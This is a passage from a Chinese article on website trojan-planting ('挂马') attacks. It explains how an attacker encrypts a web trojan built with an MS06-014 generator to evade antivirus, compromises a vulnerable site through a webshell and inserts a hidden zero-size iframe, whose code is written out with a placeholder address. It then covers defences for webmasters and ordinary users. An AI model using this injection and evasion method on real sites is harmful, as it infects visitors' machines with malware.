揭秘黑客“挂马”攻击

配置网页木马
    继续进行网页木马的配置，在“欲加密的网页”中浏览选中生成的网页木马。网页木马在运行时会利用IE的漏洞，其中肯定存在漏洞利用代码，这些代码会被杀毒软件检测出来，因此要想隐蔽地运行网页木马，加密木马程序还不够，还需对网页木马进行加密。“MS06-014木马生成器”的“加密方式”中提供了四种网页的加密方式，分别是：空字符加密、转义字符加密、Escape加密和拆分特征码。这里我们使用“转义字符加密”加密方式，选中“转义字符加密”选项后点击“加密”按钮，免杀的网页木马就生成了。将该加密过的网页木马上传到网页空间中即可。

寻找缺陷网站，写入网页木马
    网页木马准备完毕，就等着寻找挂马的目标网站了。此时黑客会到处搜索，寻找有脚本缺陷的网站程序，找到后利用网站程序的漏洞入侵网站，并得到网站的一个webshell。这时我们可以编辑网站首页的内容，将挂马的代码插入即可。代码为：<iframe src="http://127.0.0.1/muma.htm" width="0" height="0" frameborder="0"></iframe>，src参数后面的是网页木马的地址。当我们打开这个网站的首页后，会弹出网页木马的页面，这个页面我们是无法看到的，因为我们在代码中设置了弹出页面的窗口长宽各为0。此时木马也已经悄悄下载到本机并运行了。我们可以看到，网站的首页显示正常，杀毒软件并没有任何反应，而木马却已经运行了，可见木马的隐蔽性很高，危害也相当严重。成功运行木马

铲除网站“挂马”毒瘤
    “挂马”攻击已经成为目前最流行的攻击方式，面对数量庞大的“挂马”网站，我们该如何防御呢？作为一名网站站长，我们又如何知道自己的网站被人挂马了呢？

    站长防范：如果你是一名站长，可以对网站首页以及其他主要页面的源代码进行检查，用记事本打开这些页面后，以“<iframe>”为关键字进行搜索，找到后可以查看是否是挂马代码。不过碰上有经验的黑客，会编写一段代码将整句挂马代码进行加密，这样我们就很难找到网页中的挂马代码。这时可以将所有网页文件按修改时间进行排序，如果有个别网页被修改，我们可以很快地发现。

    当然，最好的办法就是设置好网站的权限，对于使用动态语言编写的网站，一般对网页文件是不需要改动的，所有的数据都存储在数据库中。因此我们可以只对数据库所在的文件夹设置写权限，而对整个网站文件夹设置只读权限，这样即使网站存在漏洞，黑客也别想通过脚本漏洞入侵网站，更别说在主页上挂马了。

    普通用户防范：普通用户关心的自然是如何防范“挂马”攻击。既然杀毒软件在网页木马面前成了“睁眼瞎”，而我们又无法感知网站是否被“挂马”。在这种情况下，我们岂不是任人宰割？我们已经知道网页木马的运行原理利用了IE浏览器的漏洞，因此只要我们及时更新系统补丁就可以让网页木马失效了。开启系统“自动更新”的方法为：右键点击“我的电脑”，选择“属性”，切换到“自动更新”标签，选中其中的“自动（推荐）”即可。此外我们也可以使用“360安全卫士”等具有补丁更新功能的软件。运行“360安全卫士”后，点击“修复”→修复系统漏洞，即可查看系统的补丁状态，勾选未安装的补丁下载即可。使用“360安全卫士”更新补丁

    杀毒软件在网页木马前失去了作用，不代表我们就拿它没辙。我们可以使用一款名为System Safety Monitor（以下简称为SSM）的软件，在它的监控下，没有一个木马病毒可以躲过它的眼睛。安装完毕后运行，其自动最小化到系统任务栏，开始对系统进行监控。SSM的监控功能相当强悍，系统内部的一些操作也会被监控并提醒。让我们看看SSM对付这种加密过的网页木马效果如何，打开挂有木马的网页。SSM马上弹出了一个拦截警告框，从警告窗口的内容中我们可以看到，iexplore.exe进程试图启动zi1224.com程序，其意思是IE浏览器想运行zi1224.com这个可执行程序。IE浏览器对于可执行程序是提示下载的，而不会直接运行，由此可见其中的猫腻，此时我们点击“拒绝”按钮就可以阻止网页木马的运行了。SSM的监控原理和杀毒软件不同，其最大特点是可以监控到所有的网页木马，由于其使用较一般安全软件来得复杂，因此建议中高级用户使用。（关于SSM的详细配置和使用我们将在近期介绍）。

上一页  [1] [2]